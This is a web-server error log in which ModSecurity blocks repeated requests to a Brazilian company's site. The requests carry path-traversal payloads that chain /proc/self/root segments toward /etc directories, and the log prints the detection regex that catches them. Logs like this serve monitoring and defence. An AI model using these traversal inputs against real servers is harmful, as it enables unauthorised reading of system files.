[Wed Mar 18 08:01:23.351025 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.243.128:32934] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqGA-oXxyEfFpUF8f9SkgAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:01:24.755289 2026] [:error] [pid 17653:tid 140411641214720] [client 74.7.243.128:39428] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqGBMdf6f5d65gmYZS3QgAAAsw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:01:26.038948 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.243.128:39438] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqGBvu8EFLIOrSqIpvo-wAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:01:39.109127 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.243.128:39454] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqGEsdf6f5d65gmYZS3UwAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:01:39.519475 2026] [mime_magic:error] [pid 15051:tid 140411548894976] (70014)End of file found: [client 57.141.18.114:42564] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 08:01:56.738223 2026] [:error] [pid 15051:tid 140411599251200] [client 74.7.243.128:54018] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqGJCmAPhZkrhU8w4lRMAAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:02:16.187543 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.241.31:46278] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqGOOyqAr6etmhZHNqgjwAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:02:20.263227 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.243.128:47988] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqGPOoXxyEfFpUF8f9S4QAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:02:21.957262 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.241.31:54576] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqGPcdf6f5d65gmYZS3bgAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:02:56.252141 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.244.43:59068] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqGYMdf6f5d65gmYZS3hQAAAtE"]
[Wed Mar 18 08:02:57.926819 2026] [:error] [pid 11816:tid 140411624429312] [client 74.7.228.61:48274] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqGYew_le52K8_3pV3DngAAAg4"]
[Wed Mar 18 08:03:03.650176 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.241.31:54590] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqGZ-yqAr6etmhZHNqgyAAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:03:07.472468 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.241.31:52564] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqGa_u8EFLIOrSqIpvpMwAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:03:12.346549 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.241.31:36298] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqGcOyqAr6etmhZHNqg0QAAAEA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:03:38.662970 2026] [:error] [pid 11816:tid 140411540502272] [client 74.7.241.31:36310] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqGiuw_le52K8_3pV3DvAAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:04:21.552389 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.241.31:46382] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqGtQkwaGbbGflqUZD0ngAAANY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:04:30.173492 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.243.128:54900] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqGvtY0UrI5A3LftIyCSAAAAYY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:04:34.431575 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.241.31:52046] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqGwtY0UrI5A3LftIyCTQAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:04:39.996553 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.241.31:46260] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqGx9a6ubjKNq_cu4Z7YAAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:04:53.803519 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.241.31:35956] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqG1eyqAr6etmhZHNqhCgAAAEA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:05:04.491849 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.243.128:53026] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqG4Pu8EFLIOrSqIpvpiwAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:05:10.499459 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.241.31:39022] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqG5uoXxyEfFpUF8f9TOgAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:05:11.770916 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.241.31:53384] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqG59a6ubjKNq_cu4Z7fQAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:05:19.451305 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.241.31:53392] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqG7wkwaGbbGflqUZD0ygAAANE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
